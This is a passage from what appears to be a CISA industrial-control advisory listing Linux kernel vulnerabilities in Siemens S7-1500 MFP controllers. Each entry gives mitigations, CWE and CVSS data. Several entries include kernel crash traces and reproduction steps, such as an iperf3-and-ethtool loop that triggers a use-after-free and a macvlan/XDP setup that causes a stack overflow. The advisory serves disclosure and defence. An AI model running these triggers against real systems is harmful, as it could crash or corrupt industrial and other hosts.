<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23321</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: pm: in-kernel: always mark signal+subflow endp as used Syzkaller managed to find a combination of actions that was generating this warning: msk-&gt;pm.local_addr_used == 0 WARNING: net/mptcp/pm_kernel.c:1071 at __mark_subflow_endp_available net/mptcp/pm_kernel.c:1071 [inline], CPU#1: syz.2.17/961 WARNING: net/mptcp/pm_kernel.c:1071 at mptcp_nl_remove_subflow_and_signal_addr net/mptcp/pm_kernel.c:1103 [inline], CPU#1: syz.2.17/961 WARNING: net/mptcp/pm_kernel.c:1071 at mptcp_pm_nl_del_addr_doit+0x81d/0x8f0 net/mptcp/pm_kernel.c:1210, CPU#1: syz.2.17/961 Modules linked in: CPU: 1 UID: 0 PID: 961 Comm: syz.2.17 Not tainted 6.19.0-08368-gfafda3b4b06b #22 PREEMPT(full) Hardware name: QEMU Ubuntu 25.10 PC v2 (i440FX + PIIX, + 10.1 machine, 1996), BIOS 1.17.0-debian-1.17.0-1build1 04/01/2014 RIP: 0010:__mark_subflow_endp_available net/mptcp/pm_kernel.c:1071 [inline] RIP: 0010:mptcp_nl_remove_subflow_and_signal_addr net/mptcp/pm_kernel.c:1103 [inline] RIP: 0010:mptcp_pm_nl_del_addr_doit+0x81d/0x8f0 net/mptcp/pm_kernel.c:1210 Code: 89 c5 e8 46 30 6f fe e9 21 fd ff ff 49 83 ed 80 e8 38 30 6f fe 4c 89 ef be 03 00 00 00 e8 db 49 df fe eb ac e8 24 30 6f fe 90 &lt;0f&gt; 0b 90 e9 1d ff ff ff e8 16 30 6f fe eb 05 e8 0f 30 6f fe e8 9a RSP: 0018:ffffc90001663880 EFLAGS: 00010293 RAX: ffffffff82de1a6c RBX: 0000000000000000 RCX: ffff88800722b500 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffff8880158b22d0 R08: 0000000000010425 R09: ffffffffffffffff R10: ffffffff82de18ba R11: 0000000000000000 R12: ffff88800641a640 R13: ffff8880158b1880 R14: ffff88801ec3c900 R15: ffff88800641a650 FS: 00005555722c3500(0000) GS:ffff8880f909d000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f66346e0f60 CR3: 000000001607c000 CR4: 0000000000350ef0 Call Trace: genl_family_rcv_msg_doit+0x117/0x180 net/netlink/genetlink.c:1115 genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline] genl_rcv_msg+0x3a8/0x3f0 net/netlink/genetlink.c:1210 netlink_rcv_skb+0x16d/0x240 net/netlink/af_netlink.c:2550 genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x3e9/0x4c0 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x4aa/0x5b0 net/netlink/af_netlink.c:1894 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg+0xc9/0xf0 net/socket.c:742 ____sys_sendmsg+0x272/0x3b0 net/socket.c:2592 ___sys_sendmsg+0x2de/0x320 net/socket.c:2646 __sys_sendmsg net/socket.c:2678 [inline] __do_sys_sendmsg net/socket.c:2683 [inline] __se_sys_sendmsg net/socket.c:2681 [inline] __x64_sys_sendmsg+0x110/0x1a0 net/socket.c:2681 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x143/0x440 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f66346f826d Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 &lt;48&gt; 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffc83d8bdc8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00007f6634985fa0 RCX: 00007f66346f826d RDX: 00000000040000b0 RSI: 0000200000000740 RDI: 0000000000000007 RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 00007f6634985fa8 R13: 00007f6634985fac R14: 0000000000000000 R15: 0000000000001770 The actions that caused that seem to be: - Set the MPTCP subflows limit to 0 - Create an MPTCP endpoint with both the 'signal' and 'subflow' flags - Create a new MPTCP connection from a different address: an ADD_ADDR linked to the MPTCP endpoint will be sent ('signal' flag), but no subflows is initiated ('subflow' flag) - Remove the MPTCP endpoint ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23321">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/911.html">CWE-911 Improper Update of Reference Count</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.3</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23335</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: Fix kernel stack leak in irdma_create_user_ah() struct irdma_create_ah_resp { // 8 bytes, no padding __u32 ah_id; // offset 0 - SET (uresp.ah_id = ah-&gt;sc_ah.ah_info.ah_idx) __u8 rsvd[4]; // offset 4 - NEVER SET &lt;- LEAK }; rsvd[4]: 4 bytes of stack memory leaked unconditionally. Only ah_id is assigned before ib_respond_udata(). The reserved members of the structure were not zeroed.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23335">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/908.html">CWE-908 Use of Uninitialized Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.3</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23340</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: sched: avoid qdisc_reset_all_tx_gt() vs dequeue race for lockless qdiscs When shrinking the number of real tx queues, netif_set_real_num_tx_queues() calls qdisc_reset_all_tx_gt() to flush qdiscs for queues which will no longer be used. qdisc_reset_all_tx_gt() currently serializes qdisc_reset() with qdisc_lock(). However, for lockless qdiscs, the dequeue path is serialized by qdisc_run_begin/end() using qdisc-&gt;seqlock instead, so qdisc_reset() can run concurrently with __qdisc_run() and free skbs while they are still being dequeued, leading to UAF. This can easily be reproduced on e.g. virtio-net by imposing heavy traffic while frequently changing the number of queue pairs: iperf3 -ub0 -c $peer -t 0 &amp; while :; do ethtool -L eth0 combined 1 ethtool -L eth0 combined 2 done With KASAN enabled, this leads to reports like: BUG: KASAN: slab-use-after-free in __qdisc_run+0x133f/0x1760 ... Call Trace: ... __qdisc_run+0x133f/0x1760 __dev_queue_xmit+0x248f/0x3550 ip_finish_output2+0xa42/0x2110 ip_output+0x1a7/0x410 ip_send_skb+0x2e6/0x480 udp_send_skb+0xb0a/0x1590 udp_sendmsg+0x13c9/0x1fc0 ... Allocated by task 1270 on cpu 5 at 44.558414s: ... alloc_skb_with_frags+0x84/0x7c0 sock_alloc_send_pskb+0x69a/0x830 __ip_append_data+0x1b86/0x48c0 ip_make_skb+0x1e8/0x2b0 udp_sendmsg+0x13a6/0x1fc0 ... Freed by task 1306 on cpu 3 at 44.558445s: ... kmem_cache_free+0x117/0x5e0 pfifo_fast_reset+0x14d/0x580 qdisc_reset+0x9e/0x5f0 netif_set_real_num_tx_queues+0x303/0x840 virtnet_set_channels+0x1bf/0x260 [virtio_net] ethnl_set_channels+0x684/0xae0 ethnl_default_set_doit+0x31a/0x890 ... Serialize qdisc_reset_all_tx_gt() against the lockless dequeue path by taking qdisc-&gt;seqlock for TCQ_F_NOLOCK qdiscs, matching the serialization model already used by dev_reset_queue(). Additionally clear QDISC_STATE_NON_EMPTY after reset so the qdisc state reflects an empty queue, avoiding needless re-scheduling.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23340">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/364.html">CWE-364 Signal Handler Race Condition</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23343</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: xdp: produce a warning when calculated tailroom is negative Many ethernet drivers report xdp Rx queue frag size as being the same as DMA write size. However, the only user of this field, namely bpf_xdp_frags_increase_tail(), clearly expects a truesize. Such difference leads to unspecific memory corruption issues under certain circumstances, e.g. in ixgbevf maximum DMA write size is 3 KB, so when running xskxceiver's XDP_ADJUST_TAIL_GROW_MULTI_BUFF, 6K packet fully uses all DMA-writable space in 2 buffers. This would be fine, if only rxq-&gt;frag_size was properly set to 4K, but value of 3K results in a negative tailroom, because there is a non-zero page offset. We are supposed to return -EINVAL and be done with it in such case, but due to tailroom being stored as an unsigned int, it is reported to be somewhere near UINT_MAX, resulting in a tail being grown, even if the requested offset is too much (it is around 2K in the abovementioned test). This later leads to all kinds of unspecific calltraces. [ 7340.337579] xskxceiver[1440]: segfault at 1da718 ip 00007f4161aeac9d sp 00007f41615a6a00 error 6 [ 7340.338040] xskxceiver[1441]: segfault at 7f410000000b ip 00000000004042b5 sp 00007f415bffecf0 error 4 [ 7340.338179] in libc.so.6[61c9d,7f4161aaf000+160000] [ 7340.339230] in xskxceiver[42b5,400000+69000] [ 7340.340300] likely on CPU 6 (core 0, socket 6) [ 7340.340302] Code: ff ff 01 e9 f4 fe ff ff 0f 1f 44 00 00 4c 39 f0 74 73 31 c0 ba 01 00 00 00 f0 0f b1 17 0f 85 ba 00 00 00 49 8b 87 88 00 00 00 &lt;4c&gt; 89 70 08 eb cc 0f 1f 44 00 00 48 8d bd f0 fe ff ff 89 85 ec fe [ 7340.340888] likely on CPU 3 (core 0, socket 3) [ 7340.345088] Code: 00 00 00 ba 00 00 00 00 be 00 00 00 00 89 c7 e8 31 ca ff ff 89 45 ec 8b 45 ec 85 c0 78 07 b8 00 00 00 00 eb 46 e8 0b c8 ff ff &lt;8b&gt; 00 83 f8 69 74 24 e8 ff c7 ff ff 8b 00 83 f8 0b 74 18 e8 f3 c7 [ 7340.404334] Oops: general protection fault, probably for non-canonical address 0x6d255010bdffc: 0000 [#1] SMP NOPTI [ 7340.405972] CPU: 7 UID: 0 PID: 1439 Comm: xskxceiver Not tainted 6.19.0-rc1+ #21 PREEMPT(lazy) [ 7340.408006] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.17.0-5.fc42 04/01/2014 [ 7340.409716] RIP: 0010:lookup_swap_cgroup_id+0x44/0x80 [ 7340.410455] Code: 83 f8 1c 73 39 48 ba ff ff ff ff ff ff ff 03 48 8b 04 c5 20 55 fa bd 48 21 d1 48 89 ca 83 e1 01 48 d1 ea c1 e1 04 48 8d 04 90 &lt;8b&gt; 00 48 83 c4 10 d3 e8 c3 cc cc cc cc 31 c0 e9 98 b7 dd 00 48 89 [ 7340.412787] RSP: 0018:ffffcc5c04f7f6d0 EFLAGS: 00010202 [ 7340.413494] RAX: 0006d255010bdffc RBX: ffff891f477895a8 RCX: 0000000000000010 [ 7340.414431] RDX: 0001c17e3fffffff RSI: 00fa070000000000 RDI: 000382fc7fffffff [ 7340.415354] RBP: 00fa070000000000 R08: ffffcc5c04f7f8f8 R09: ffffcc5c04f7f7d0 [ 7340.416283] R10: ffff891f4c1a7000 R11: ffffcc5c04f7f9c8 R12: ffffcc5c04f7f7d0 [ 7340.417218] R13: 03ffffffffffffff R14: 00fa06fffffffe00 R15: ffff891f47789500 [ 7340.418229] FS: 0000000000000000(0000) GS:ffff891ffdfaa000(0000) knlGS:0000000000000000 [ 7340.419489] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 7340.420286] CR2: 00007f415bfffd58 CR3: 0000000103f03002 CR4: 0000000000772ef0 [ 7340.421237] PKRU: 55555554 [ 7340.421623] Call Trace: [ 7340.421987] [ 7340.422309] ? softleaf_from_pte+0x77/0xa0 [ 7340.422855] swap_pte_batch+0xa7/0x290 [ 7340.423363] zap_nonpresent_ptes.constprop.0.isra.0+0xd1/0x270 [ 7340.424102] zap_pte_range+0x281/0x580 [ 7340.424607] zap_pmd_range.isra.0+0xc9/0x240 [ 7340.425177] unmap_page_range+0x24d/0x420 [ 7340.425714] unmap_vmas+0xa1/0x180 [ 7340.426185] exit_mmap+0xe1/0x3b0 [ 7340.426644] __mmput+0x41/0x150 [ 7340.427098] exit_mm+0xb1/0x110 [ 7340.427539] do_exit+0x1b2/0x460 [ 7340.427992] do_group_exit+0x2d/0xc0 [ 7340.428477] get_signal+0x79d/0x7e0 [ 7340.428957] arch_do_signal_or_restart+0x34/0x100 [ 7340.429571] exit_to_user_mode_loop+0x8e/0x4c0 [ 7340.430159] do_syscall_64+0x188/ ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23343">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23351</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_pipapo: split gc into unlink and reclaim phase Yiming Qian reports Use-after-free in the pipapo set type: Under a large number of expired elements, commit-time GC can run for a very long time in a non-preemptible context, triggering soft lockup warnings and RCU stall reports (local denial of service). We must split GC in an unlink and a reclaim phase. We cannot queue elements for freeing until pointers have been swapped. Expired elements are still exposed to both the packet path and userspace dumpers via the live copy of the data structure. call_rcu() does not protect us: dump operations or element lookups starting after call_rcu has fired can still observe the free'd element, unless the commit phase has made enough progress to swap the clone and live pointers before any new reader has picked up the old version. This a similar approach as done recently for the rbtree backend in commit 35f83a75529a ("netfilter: nft_set_rbtree: don't gc elements on insert").</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23351">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23359</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf: Fix stack-out-of-bounds write in devmap get_upper_ifindexes() iterates over all upper devices and writes their indices into an array without checking bounds. Also the callers assume that the max number of upper devices is MAX_NEST_DEV and allocate excluded_devices[1+MAX_NEST_DEV] on the stack, but that assumption is not correct and the number of upper devices could be larger than MAX_NEST_DEV (e.g., many macvlans), causing a stack-out-of-bounds write. Add a max parameter to get_upper_ifindexes() to avoid the issue. When there are too many upper devices, return -EOVERFLOW and abort the redirect. To reproduce, create more than MAX_NEST_DEV(8) macvlans on a device with an XDP program attached using BPF_F_BROADCAST | BPF_F_EXCLUDE_INGRESS. Then send a packet to the device to trigger the XDP redirect path.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23359">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23365</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: usb: kalmia: validate USB endpoints The kalmia driver should validate that the device it is probing has the proper number and types of USB endpoints it is expecting before it binds to it. If a malicious device were to not have the same urbs the driver will crash later on when it blindly accesses these endpoints.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23365">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
